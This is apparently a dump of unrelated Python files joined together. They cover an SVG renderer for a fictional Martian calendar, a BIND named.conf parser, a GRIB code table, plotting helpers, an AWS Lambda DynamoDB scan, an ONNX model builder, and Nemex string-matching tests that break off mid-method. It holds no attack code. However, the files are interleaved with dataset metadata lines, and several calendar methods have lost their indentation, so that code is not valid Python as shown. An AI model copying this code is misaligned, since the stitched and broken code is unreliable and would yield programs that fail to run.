    FONT_FAMILY_BOLD: str = """fot-tsukubrdgothic-std, "FOT-TsukuBRdGothic Std B", "FOT-筑紫B丸ゴシック Std B", TsukuBRdGothic-Bold, "筑紫B丸ゴシック ボールド", sans-serif"""  # noqa: E501
    FONT_FAMILY_REGULAR: str = """fot-tsukubrdgothic-std, "FOT-TsukuBRdGothic Std B", "FOT-筑紫B丸ゴシック Std B", TsukuBRdGothic-Bold, "筑紫B丸ゴシック ボールド", sans-serif"""  # noqa: E501
    # Font sizes in pt.
    FONT_SIZE_ANNOTATION: float = 8.0
    FONT_SIZE_BOLD_LARGE: float = 32.0
    FONT_SIZE_LARGE: float = 20.0
    FONT_SIZE_SMALL: float = 10.0
    GRAY_BLUE: str = "#6bb4d6"  # "#a5c7d6"
    GRAY_RED: str = "#ff9d80"  # "#ffb7a1"
    GRAY: str = "#888888"  # "#999999"
    # Layout metrics in mm.
    HEIGHT_DAYS_GAP: float = 4.5
    HEIGHT_GRDT_BELT: float = 5.5
    HEIGHT_TOP_SPACE: float = 15.0
    RED: str = "#e03f0c"  # "#e07553"
    SIZE_DAY_SQUARE: float = 22.5
    STROKE_WIDTH_BOLD: str = "0.4mm"
    STROKE_WIDTH_THIN: str = "0.15mm"
    WHITE: str = "#ffffff"  # "#ffffff"
    WIDTH_LEFT_SPACE: float = 45.0

    # Instance attributes (set in __init__).
    grdt_timezone: str  # Gregorian-side timezone string
    imdt: ImperialDateTime  # first day (00:00:00) of the month being drawn
def __init__(self, imdt: ImperialDateTime, grdt_timezone: str):
"""Init."""
self.grdt_timezone = grdt_timezone
self.imdt = imdt.copy()
self.imdt.day = 1
self.imdt.hour = 0
self.imdt.minute = 0
self.imdt.second = 0
    def draw_as_svg(self) -> bytes:
        """Draw a imdt calendar image as SVG string.

        NOTE(review): ``ET.tostring(..., encoding="utf-8")`` returns *bytes*;
        the annotation was corrected from ``str``.  Use ``encoding="unicode"``
        if a ``str`` is actually wanted by callers.
        """
        # 210mm x 148mm landscape canvas.
        svg = ET.Element(
            "svg",
            {
                "height": "148mm",
                "style": f"""
                background-color: {CalendarImage.WHITE};
                """.strip(),
                "width": "210mm",
                "xmlns": "http://www.w3.org/2000/svg",
            },
        )
        with e("title", {}, f"帝國火星曆{self.imdt.year}年{self.imdt.month}月", parent=svg):
            pass
        with e(
            "g",
            {"font-family": CalendarImage.FONT_FAMILY_REGULAR},
            parent=svg,
        ) as _e:
            # Draw order matters: later elements paint on top.
            self.__draw_title(_e)
            self.__draw_joubi(_e)
            self.__draw_static_frame(_e)
            self.__draw_imdt_days(_e)
            self.__draw_imdt_syukuzitu(_e)
            self.__draw_grdt_days(_e)
        # return ET.tostring(svg, encoding="utf-8", xml_declaration=True)
        return ET.tostring(svg, encoding="utf-8")
    def __draw_grdt_day(self, _e, grdt: GregorianDateTime) -> None:
        """Overlay one Gregorian day onto the belt under the imperial grid.

        Draws a tick line at the instant the Gregorian day starts (converted
        to imperial time) and, when there is room, the Gregorian day number.
        """
        imdt = grdt_to_imdt(grdt, self.imdt.timezone)
        # Horizontal offset (mm) of the day boundary within its day square,
        # proportional to the imperial time-of-day.
        line_x = (
            (((imdt.hour * 60) + imdt.minute) * 60 + imdt.second)
            / (24 * 60 * 60)
            * CalendarImage.SIZE_DAY_SQUARE
        )
        if imdt.month == self.imdt.month:
            # Vertical tick across the belt (x1 == x2).
            x1 = (
                CalendarImage.WIDTH_LEFT_SPACE
                + line_x
                + CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
            )
            x2 = (
                CalendarImage.WIDTH_LEFT_SPACE
                + line_x
                + CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
            )
            y1 = (
                CalendarImage.HEIGHT_TOP_SPACE
                + CalendarImage.SIZE_DAY_SQUARE
                + (
                    CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                    + CalendarImage.SIZE_DAY_SQUARE
                )
                * ((imdt.day - 1) // 7)
            )
            y2 = (
                CalendarImage.HEIGHT_TOP_SPACE
                + CalendarImage.SIZE_DAY_SQUARE
                + CalendarImage.HEIGHT_GRDT_BELT
                + (
                    CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                    + CalendarImage.SIZE_DAY_SQUARE
                )
                * ((imdt.day - 1) // 7)
            )
            with _e(
                "line",
                {
                    "stroke": CalendarImage.BLACK,
                    "stroke-width": CalendarImage.STROKE_WIDTH_THIN,
                    "x1": f"{x1}mm",
                    "x2": f"{x2}mm",
                    "y1": f"{y1}mm",
                    "y2": f"{y2}mm",
                },
            ):
                pass
        next_grdt_day = next_grdt_day_of(grdt)
        next_grdt_day_imdt = grdt_to_imdt(next_grdt_day, self.imdt.timezone)
        next_line_x = (
            (
                ((next_grdt_day_imdt.hour * 60) + next_grdt_day_imdt.minute) * 60
                + next_grdt_day_imdt.second
            )
            / (24 * 60 * 60)
            * CalendarImage.SIZE_DAY_SQUARE
        )
        # Rough text-width check: 0.353 mm/pt * ~0.6 em per glyph + margin.
        is_drawable_on_beginning_of_month = (
            next_line_x
            > 0.353 * CalendarImage.FONT_SIZE_SMALL * (len("10/10") * 0.6) + 1.5
        )
        # Label color: red-ish for holidays/Sundays, blue-ish for Saturdays.
        if grdt.is_holiday or grdt.weekday == 7:
            color = CalendarImage.GRAY_RED
        elif grdt.weekday == 6:
            color = CalendarImage.GRAY_BLUE
        else:
            color = CalendarImage.GRAY
        if imdt.month == self.imdt.month:
            # "month/day" on month starts (or when the month-start label
            # could not be drawn earlier); bare day number otherwise.
            text = (
                f"{grdt.month}/{grdt.day}"
                if grdt.day == 1
                or (imdt.day == 1 and not is_drawable_on_beginning_of_month)
                else str(grdt.day)
            )
            is_drawable_on_weekend = (
                CalendarImage.SIZE_DAY_SQUARE - line_x
            ) > 0.353 * CalendarImage.FONT_SIZE_SMALL * (len(text) * 0.6) + 1.5
            if (
                imdt.day == ImperialYearMonth(self.imdt.year, self.imdt.month).days()
                and not is_drawable_on_weekend
            ):
                # No room at the very end of the month: skip the label.
                pass
            elif imdt.day % 7 == 0 and not is_drawable_on_weekend:
                # End of a week row: wrap the label to the next row's start.
                self.__draw_text(
                    _e,
                    {
                        "fill": color,
                        "font-size": CalendarImage.FONT_SIZE_SMALL,
                        "x": f"{CalendarImage.WIDTH_LEFT_SPACE + 1}mm",
                        "y": CalendarImage.HEIGHT_TOP_SPACE
                        + CalendarImage.SIZE_DAY_SQUARE
                        + 0.5
                        + (
                            CalendarImage.HEIGHT_GRDT_BELT
                            + CalendarImage.HEIGHT_DAYS_GAP
                            + CalendarImage.SIZE_DAY_SQUARE
                        )
                        * (imdt.day // 7),
                    },
                    text,
                )
            else:
                x = (
                    CalendarImage.WIDTH_LEFT_SPACE
                    + line_x
                    + 1
                    + CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
                )
                self.__draw_text(
                    _e,
                    {
                        "fill": color,
                        "font-size": CalendarImage.FONT_SIZE_SMALL,
                        "x": f"{x}mm",
                        "y": CalendarImage.HEIGHT_TOP_SPACE
                        + CalendarImage.SIZE_DAY_SQUARE
                        + 0.5
                        + (
                            CalendarImage.HEIGHT_GRDT_BELT
                            + CalendarImage.HEIGHT_DAYS_GAP
                            + CalendarImage.SIZE_DAY_SQUARE
                        )
                        * ((imdt.day - 1) // 7),
                    },
                    text,
                )
        else:
            # Day belongs to the previous imperial month: only draw the
            # "month/day" marker at the very start of the first row.
            if is_drawable_on_beginning_of_month:
                self.__draw_text(
                    _e,
                    {
                        "fill": color,
                        "font-size": CalendarImage.FONT_SIZE_SMALL,
                        "x": f"{CalendarImage.WIDTH_LEFT_SPACE + 1}mm",
                        "y": CalendarImage.HEIGHT_TOP_SPACE
                        + CalendarImage.SIZE_DAY_SQUARE
                        + 0.5,
                    },
                    f"{grdt.month}/{grdt.day}",
                )
    def __draw_grdt_days(self, _e) -> None:
        # Walk Gregorian days from the start of the imperial month until the
        # next imperial month begins, overlaying each onto the belt.
        drawing_grdt_day = imdt_to_grdt(self.imdt, self.grdt_timezone)
        drawing_grdt_day.hour = 0
        drawing_grdt_day.minute = 0
        drawing_grdt_day.second = 0
        while (
            grdt_to_imdt(drawing_grdt_day, self.imdt.timezone)
            < self.__next_imdt_month()
        ):
            self.__draw_grdt_day(_e, drawing_grdt_day)
            drawing_grdt_day = next_grdt_day_of(drawing_grdt_day)
    def __draw_imdt_days(self, _e) -> None:
        """Draw the imperial day numbers (and inline holiday names)."""
        for day in range(
            1, ImperialYearMonth(self.imdt.year, self.imdt.month).days() + 1
        ):
            imdt = self.imdt.copy()
            imdt.day = day
            # Day 1 of each 7-day week and holidays are red; day 7 is blue.
            if imdt.holiday is not None or day % 7 == 1:
                color = CalendarImage.RED
            elif day % 7 == 0:
                color = CalendarImage.BLUE
            else:
                color = CalendarImage.BLACK
            x = (
                CalendarImage.WIDTH_LEFT_SPACE
                + 1
                + CalendarImage.SIZE_DAY_SQUARE * ((day - 1) % 7)
            )
            y = (
                CalendarImage.HEIGHT_TOP_SPACE
                + 1
                + (
                    CalendarImage.SIZE_DAY_SQUARE
                    + CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                )
                * ((day - 1) // 7)
            )
            self.__draw_text(
                _e,
                {
                    "fill": color,
                    "font-size": CalendarImage.FONT_SIZE_SMALL,
                    "x": f"{x}mm",
                    "y": y,
                },
                str(day),
            )
            if imdt.holiday is not None:
                # Approximate width of the day number to place the holiday
                # name right after it.
                day_width = (
                    CalendarImage.FONT_SIZE_SMALL * (0.353 - 0.06) * len(str(day))
                )
                self.__draw_text(
                    _e,
                    {
                        "fill": color,
                        "font-size": CalendarImage.FONT_SIZE_ANNOTATION,
                        "style": f"""
                        inline-size: {CalendarImage.SIZE_DAY_SQUARE - day_width - 1}mm;
                        """.strip(),
                        "x": f"{x + day_width}mm",
                        "y": y + 0.2,
                    },
                    str("・".join(imdt.holiday.names)),
                )
                # Earlier foreignObject-based implementation kept for
                # reference (not all SVG renderers support it):
                # with _e(
                #     "foreignObject",
                #     {
                #         "height": f"{CalendarImage.SIZE_DAY_SQUARE}mm",
                #         "requiredExtensions": "http://www.w3.org/1999/xhtml",
                #         "width": f"{CalendarImage.SIZE_DAY_SQUARE - day_width - 1}mm",
                #         "x": f"{x + day_width}mm",
                #         "y": f"{y + 0.2}mm",
                #     },
                # ) as _e1:
                #     with _e1(
                #         "div",
                #         {
                #             "style": f"""
                #             color: {color};
                #             font-size: {CalendarImage.FONT_SIZE_ANNOTATION}pt;
                #             """.strip(),
                #             "xmlns": "http://www.w3.org/1999/xhtml",
                #         },
                #         str("・".join(imdt.holiday.names)),
                #     ):
                #         pass
    def __draw_imdt_syukuzitu(self, _e) -> None:
        # Currently a stub: holiday (祝日) names are rendered inline by
        # __draw_imdt_days.  Kept as a hook called from draw_as_svg.
        pass
def __draw_joubi(self, _e) -> None:
for i, (joubi, color) in enumerate(
[
("日", CalendarImage.RED),
("月", CalendarImage.BLACK),
("火", CalendarImage.BLACK),
("水", CalendarImage.BLACK),
("木", CalendarImage.BLACK),
("金", CalendarImage.BLACK),
("土", CalendarImage.BLUE),
]
):
x = (
CalendarImage.WIDTH_LEFT_SPACE
+ (CalendarImage.SIZE_DAY_SQUARE / 2)
- 2.0
+ CalendarImage.SIZE_DAY_SQUARE * i
)
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{x}mm",
"y": CalendarImage.HEIGHT_TOP_SPACE - 5,
},
joubi,
)
    def __draw_static_frame(self, _e) -> None:
        """Draw the week-row frames, belt separators and cell dividers."""
        days = ImperialYearMonth(self.imdt.year, self.imdt.month).days()
        for i in range(4):
            # The last row has only 6 day cells when the month is 27 days.
            days_of_week = 6 if i == 3 and days == 27 else 7
            y = (
                CalendarImage.HEIGHT_TOP_SPACE
                + (
                    CalendarImage.SIZE_DAY_SQUARE
                    + CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                )
                * i
            )
            # Outer rectangle of the row (day squares + Gregorian belt).
            with _e(
                "rect",
                {
                    "fill": CalendarImage.WHITE,
                    "height": f"{CalendarImage.SIZE_DAY_SQUARE + CalendarImage.HEIGHT_GRDT_BELT}mm",
                    "stroke-width": CalendarImage.STROKE_WIDTH_BOLD,
                    "stroke": CalendarImage.BLACK,
                    "width": f"{CalendarImage.SIZE_DAY_SQUARE * days_of_week}mm",
                    "x": f"{CalendarImage.WIDTH_LEFT_SPACE}mm",
                    "y": f"{y}mm",
                },
            ):
                pass
            # Horizontal separator between day area and belt (y1 == y2).
            y1 = (
                CalendarImage.HEIGHT_TOP_SPACE
                + CalendarImage.SIZE_DAY_SQUARE
                + (
                    CalendarImage.SIZE_DAY_SQUARE
                    + CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                )
                * i
            )
            y2 = (
                CalendarImage.HEIGHT_TOP_SPACE
                + CalendarImage.SIZE_DAY_SQUARE
                + (
                    CalendarImage.SIZE_DAY_SQUARE
                    + CalendarImage.HEIGHT_GRDT_BELT
                    + CalendarImage.HEIGHT_DAYS_GAP
                )
                * i
            )
            with _e(
                "line",
                {
                    "stroke-width": CalendarImage.STROKE_WIDTH_THIN,
                    "stroke": CalendarImage.BLACK,
                    "x1": f"{CalendarImage.WIDTH_LEFT_SPACE}mm",
                    "x2": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * days_of_week}mm",
                    "y1": f"{y1}mm",
                    "y2": f"{y2}mm",
                },
            ):
                pass
            # Vertical dividers between the day cells of this row.
            for j in range(days_of_week):
                y1 = (
                    CalendarImage.HEIGHT_TOP_SPACE
                    + (
                        CalendarImage.SIZE_DAY_SQUARE
                        + CalendarImage.HEIGHT_GRDT_BELT
                        + CalendarImage.HEIGHT_DAYS_GAP
                    )
                    * i
                )
                y2 = (
                    CalendarImage.HEIGHT_TOP_SPACE
                    + CalendarImage.SIZE_DAY_SQUARE
                    + (
                        CalendarImage.SIZE_DAY_SQUARE
                        + CalendarImage.HEIGHT_GRDT_BELT
                        + CalendarImage.HEIGHT_DAYS_GAP
                    )
                    * i
                )
                with _e(
                    "line",
                    {
                        "stroke-width": CalendarImage.STROKE_WIDTH_BOLD,
                        "stroke": CalendarImage.BLACK,
                        "x1": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * (j + 1)}mm",
                        "x2": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * (j + 1)}mm",
                        "y1": f"{y1}mm",
                        "y2": f"{y2}mm",
                    },
                ):
                    pass
def __draw_text(
self, _e, attrib: t.Dict[str, t.Union[str, float]], text: str
) -> None:
attrib["y"] = "{}mm".format(text_y(attrib["y"], attrib["font-size"]))
attrib["font-size"] = "{}pt".format(attrib["font-size"])
with _e("text", attrib, text):
pass
    def __draw_title(self, _e) -> None:
        """Draw the left-hand title column: calendar name, year, month and
        the Gregorian date range covered by the month."""
        self.__draw_text(
            _e,
            {
                "fill": CalendarImage.BLACK,
                "font-size": CalendarImage.FONT_SIZE_LARGE,
                "x": "5mm",
                "y": 9.5,
            },
            "帝國火星暦",
        )
        self.__draw_text(
            _e,
            {
                "fill": CalendarImage.BLACK,
                "font-size": CalendarImage.FONT_SIZE_LARGE,
                "x": "11mm",
                "y": 18.0,
            },
            f"{self.imdt.year}年",
        )
        # Nested <svg> so the big month number can be centered with
        # percentage coordinates.
        with _e(
            "svg",
            {
                "height": "44mm",
                "style": """
                background-color: transparent;
                """.strip(),
                "width": f"{CalendarImage.WIDTH_LEFT_SPACE - 8}mm",
                "x": "0mm",
                "y": "28mm",
            },
        ) as _e2:
            self.__draw_text(
                _e2,
                {
                    "fill": CalendarImage.BLACK,
                    "font-family": CalendarImage.FONT_FAMILY_BOLD,
                    "font-size": CalendarImage.FONT_SIZE_BOLD_LARGE,
                    "text-anchor": "middle",
                    "x": "64%",
                    "y": 0.0,
                },
                f"{self.imdt.month}月",
            )
        self.__draw_text(
            _e,
            {
                "fill": CalendarImage.BLACK,
                "font-size": CalendarImage.FONT_SIZE_LARGE,
                "x": "9.5mm",
                "y": 42.0,
            },
            f"({self.imdt.japanese_month_name}月)",
        )
        self.__draw_text(
            _e,
            {
                "fill": CalendarImage.GRAY,
                "font-size": CalendarImage.FONT_SIZE_ANNOTATION,
                "x": f"{CalendarImage.WIDTH_LEFT_SPACE - 5.5}mm",
                "y": 52.0,
            },
            "~",
        )
        # Gregorian start/end timestamps of the imperial month, right-aligned
        # inside another nested <svg>.
        with _e(
            "svg",
            {
                "height": "8mm",
                "style": """
                background-color: transparent;
                """.strip(),
                "width": f"{CalendarImage.WIDTH_LEFT_SPACE - 8}mm",
                "x": "2mm",
                "y": "52mm",
            },
        ) as _e2:
            weekdays = ["月", "火", "水", "木", "金", "土", "日"]
            grdt_start = imdt_to_grdt(self.imdt, self.grdt_timezone)
            grdt_start_weekday = weekdays[grdt_start.weekday - 1]
            grdt_end = imdt_to_grdt(self.__next_imdt_month(), self.grdt_timezone)
            grdt_end_weekday = weekdays[grdt_end.weekday - 1]
            self.__draw_text(
                _e2,
                {
                    "fill": CalendarImage.GRAY,
                    "font-size": CalendarImage.FONT_SIZE_ANNOTATION,
                    "text-anchor": "end",
                    "x": "100%",
                    "y": 0.0,
                },
                "{}/{}/{}({}){:02}:{:02}:{:02}".format(
                    grdt_start.year,
                    grdt_start.month,
                    grdt_start.day,
                    grdt_start_weekday,
                    grdt_start.hour,
                    grdt_start.minute,
                    grdt_start.second,
                ),
            )
            # End label omits the year when it matches the start year.
            text = ""
            if grdt_start.year != grdt_end.year:
                text += f"{grdt_end.year}/"
            text += "{}/{}({}){:02}:{:02}:{:02}".format(
                grdt_end.month,
                grdt_end.day,
                grdt_end_weekday,
                grdt_end.hour,
                grdt_end.minute,
                grdt_end.second,
            )
            self.__draw_text(
                _e2,
                {
                    "fill": CalendarImage.GRAY,
                    "font-size": CalendarImage.FONT_SIZE_ANNOTATION,
                    "text-anchor": "end",
                    "x": "100%",
                    "y": 4.0,
                },
                text,
            )
def __next_imdt_month(self) -> ImperialDateTime:
next_month = ImperialYearMonth(self.imdt.year, self.imdt.month).next_month()
return ImperialDateTime(
next_month.year, next_month.month, 1, 0, 0, 0, self.imdt.timezone
)
| 3.1875 | 3 |
insights/parsers/named_conf.py | lhuett/insights-core | 121 | 12762200 | """
NamedConf parser - file ``/etc/named.conf``
===========================================
NamedConf parser the file named configuration file.
Named is a name server used by BIND.
"""
from insights.specs import Specs
from insights.core.plugins import parser
from insights.parsers import SkipException
from insights.parsers.named_checkconf import NamedCheckconf
@parser(Specs.named_conf)
class NamedConf(NamedCheckconf):
    """
    Class for parsing the file ``/etc/named.conf``.  Most of the named.conf
    configuration is parsed by the superclass ``NamedCheckconf``; this class
    additionally parses the ``include`` directives.

    .. note::
        Please refer to the super-class :py:class:`insights.parsers.named_checkconf:NamedCheckConf`
        for more usage information.

    Attributes:
        includes (list): List of files in 'include' section.

    Raises:
        SkipException: When content is empty or cannot be parsed.

    Examples:
        >>> named_conf.includes
        ['/etc/crypto-policies/back-ends/bind.config']
    """

    def parse_content(self, content):
        super(NamedConf, self).parse_content(content)
        include_lines = [
            line for line in content
            if line.strip().startswith('include ') and ';' in line
        ]
        includes = []
        try:
            for line in include_lines:
                # e.g. 'include "/etc/crypto-policies/back-ends/bind.config";'
                path = line.split(';')[0].replace('"', '').split()[1]
                includes.append(path)
        except IndexError:
            raise SkipException("Syntax error of include directive")
        self.includes = includes
| 2.515625 | 3 |
pyeccodes/defs/grib1/0_eswi_table.py | ecmwf/pyeccodes | 7 | 12762201 | def load(h):
return ({'abbr': 'none', 'code': 0, 'title': 'not set'},
{'abbr': 96,
'code': 96,
'title': 'HIRLAM data',
'units': 'non-standard, deprecated'},
{'abbr': 98,
'code': 98,
'title': 'previously used to tag SMHI data that is ECMWF compliant',
'units': 'deprecated'})
| 1.992188 | 2 |
drawer.py | polatbilek/terrain-prediction | 1 | 12762202 | from readwrite import get_data
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
import numpy as np
def scatter(path, name):
    """Load data from *path* and line-plot its first three columns.

    Each column gets its own figure titled "column <i> <name>".
    Returns the loaded data as a DataFrame.
    """
    frame = pd.DataFrame(get_data(path))
    for col in range(3):
        plt.title("column {} ".format(col) + name)
        plt.plot(frame[col])
        plt.show()
    return frame
def boxplot(datas, names):
    """Draw one boxplot figure per column (0..2) across all datasets."""
    # One label per dataset, taken positionally from *names*.
    labels = [names[i] for i in range(len(datas))]
    for col in range(3):
        plt.title("Boxplot column {}".format(col))
        plt.boxplot([data[col] for data in datas], labels=labels)
        plt.show()
def draw_gaussian(datas):
    """Fit a Gaussian kernel density estimate to *datas* and plot the
    resulting density curve over [0, 10000)."""
    xs = np.linspace(0, 10000, 100000, endpoint=False)
    kde = gaussian_kde(datas)
    plt.plot(xs, kde(xs), color='r')
    plt.show()
| 2.875 | 3 |
lambda_func/get_card_func.py | Yunato/lambda-anki-manager | 0 | 12762203 | <gh_stars>0
import boto3
from boto3.session import Session
def lambda_handler(event, context):
    """Scan a DynamoDB table and return the scan response with 'Items'
    sorted in descending order of the primary key.

    NOTE(review): the table name and primary-key name are empty
    placeholders and must be filled in before deployment -- verify.
    """
    session = Session(region_name="ap-northeast-1")
    dynamodb = session.resource('dynamodb')
    table_name = ''
    primary_key = ''
    table = dynamodb.Table(table_name)
    response = table.scan()
    items = sorted(response['Items'], key=lambda item: item[primary_key], reverse=True)
    response['Items'] = items
    return response
| 2.34375 | 2 |
eval/src/tests/tensor/onnx_wrapper/dynamic.py | Anlon-Burke/vespa | 4,054 | 12762204 | # Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
import onnx
from onnx import helper, TensorProto
# Tensor declarations: 'batch' is a symbolic (dynamic) dimension and -1
# marks an unknown static dimension.
query_info = helper.make_tensor_value_info('query_tensor', TensorProto.FLOAT, ['batch', 4])
attribute_info = helper.make_tensor_value_info('attribute_tensor', TensorProto.FLOAT, [4, 1])
bias_info = helper.make_tensor_value_info('bias_tensor', TensorProto.FLOAT, ['batch', -1])
output_info = helper.make_tensor_value_info('output', TensorProto.FLOAT, ['batch', 1])

# Graph: matmul(query, attribute) + reduce_sum(bias, axis=1) -> output.
matmul_node = helper.make_node('MatMul', ['query_tensor', 'attribute_tensor'], ['matmul'])
reduce_node = helper.make_node('ReduceSum', ['bias_tensor'], ['reduce'], axes=[1])
add_node = helper.make_node('Add', ['matmul', 'reduce'], ['output'])

graph_def = helper.make_graph(
    [matmul_node, reduce_node, add_node],
    'dynamic_scoring',
    [query_info, attribute_info, bias_info],
    [output_info],
)

model_def = helper.make_model(
    graph_def,
    producer_name='dynamic.py',
    opset_imports=[onnx.OperatorSetIdProto(version=12)],
)
onnx.save(model_def, 'dynamic.onnx')
| 1.796875 | 2 |
tests/unit/nemex/nemex/test_nemex.py | suamin/nemex | 2 | 12762205 | <reponame>suamin/nemex<gh_stars>1-10
import unittest
from nemex import Nemex, Pruner, Default
class TestNemex(unittest.TestCase):
    """End-to-end tests for the Nemex approximate entity extractor.

    Each ``example_data_*`` method builds a Nemex instance over a small
    document/entity list, runs extraction, and returns the (expected,
    computed) match sets for the given pruner and threshold ``t``.
    Examples 3-8 are scaffolding with expectations still TODO.
    """

    def setUp(self) -> None:
        # data
        self.document = None
        self.entities = None
        self.q = Default.TOKEN_THRESH
        self.sim = Default.SIMILARITY
        self.t = Default.SIM_THRESH_CHAR
        self.pruner = Default.PRUNER
        self.nemex = None
        return None

    def setArgs(self, document, entities, q, sim, t, pruner):
        # Store the scenario parameters and (re)build the Nemex under test.
        self.document = document
        self.entities = entities
        self.q = q
        self.sim = sim
        self.t = t
        self.pruner = pruner
        self.nemex = Nemex(
            list_or_file_entities=self.entities,
            char=Default.CHAR,
            q=self.q,
            special_char=Default.SPECIAL_CHAR,
            unique=Default.UNIQUE,
            lower=Default.LOWER,
            similarity=self.sim,
            t=self.t,
            pruner=self.pruner,
            verify=Default.VERIFY
        )
        return

    @staticmethod
    def get_matches(output):
        # Flatten the Nemex output dict into a plain list of matched strings.
        matches = []
        for mdict in output['matches']:
            matches.append(mdict['match'])
        return matches

    def example_data_1(self, pruner, t):
        # Single entity 'dolor' against a short document; expectations grow
        # with the edit-distance threshold t.
        self.setArgs(
            document="Lorem ipsum dolo sit amet.",
            entities=['dolor'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        expected = []
        if t >= 0:
            expected += ['dolor']
        if t >= 1:
            expected += ['dolo', 'olor', ' dolor', 'dolor ']
        if t >= 2:
            expected += ['dol', 'lor', 'olo', 'm dolor', 'dolor s', ' dolor ', ' dolo', 'olor ']
        if t >= 3:
            expected += ['do', 'or', 'ol', 'lo', 'lor ', ' dol', 'm dolo', 'olor s']
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_2(self, pruner, t):
        # Entity 'gusta' has no exact occurrence; matches only appear at
        # higher thresholds.
        self.setArgs(
            document="At vero eos et accusam et justo duo dolores et ea rebum.",
            entities=['gusta'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += ['ust', 'just', 'usto', 'cusa', 'usa', 'justo']
        if t >= 3:
            expected += ['sto', ' just', 'usto ']
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_3(self, pruner, t):
        self.setArgs(
            document="How much wood would a woodchuck chuck if a woodchuck could chuck wood?",
            entities=['wood', 'chuck'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_4(self, pruner, t):
        self.setArgs(
            document="She sells seashells by the seashore.",
            entities=['sea', 'shells'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_5(self, pruner, t):
        self.setArgs(
            document="<NAME> bought some butter, but she said the butter’s bitter.",
            entities=['bitter', 'butter'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_6(self, pruner, t):
        self.setArgs(
            document="A big bug bit the little beetle but the little beetle bit the bug back.",
            entities=['bug', 'beetle'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_7(self, pruner, t):
        self.setArgs(
            document="Ed Nott was shot and Sam Shott was not. So it is better to be Shott than Nott. "
                     "Some say Nott was not shot. But Shott says he shot Nott. Either the shot Shott shot "
                     "at Nott was not shot, or Nott was shot. If the shot Shott shot shot Nott, Nott was shot. "
                     "But if the shot Shott shot shot Shott, the shot was Shott, not Nott. However, the shot "
                     "Shott shot shot not Shott – but Nott. So, Ed Nott was shot and that’s hot! Is it not?",
            entities=['not', 'shot'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    def example_data_8(self, pruner, t):
        self.setArgs(
            document="<NAME> picked a peck of pickled peppers. A peck of pickled peppers <NAME> picked. "
                     "If <NAME> picked a peck of pickled peppers, Where’s the peck of pickled peppers <NAME> "
                     "picked?",
            entities=['pickled', 'peppers'],
            q=Default.TOKEN_THRESH,
            sim=Default.SIMILARITY,
            t=t,
            pruner=pruner
        )
        # TODO
        expected = []
        if t >= 0:
            expected += []
        if t >= 1:
            expected += []
        if t >= 2:
            expected += []
        if t >= 3:
            expected += []
        output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
        computed = self.get_matches(output)
        return set(expected), set(computed)

    ''' Data 1 '''

    def test_nemex_bucket_t1_data_1(self):
        expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 1)
        self.assertEqual(expected, computed)
        return

    def test_nemex_bucket_t2_data_1(self):
        expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 2)
        self.assertEqual(expected, computed)
        return

    def test_nemex_bucket_t3_data_1(self):
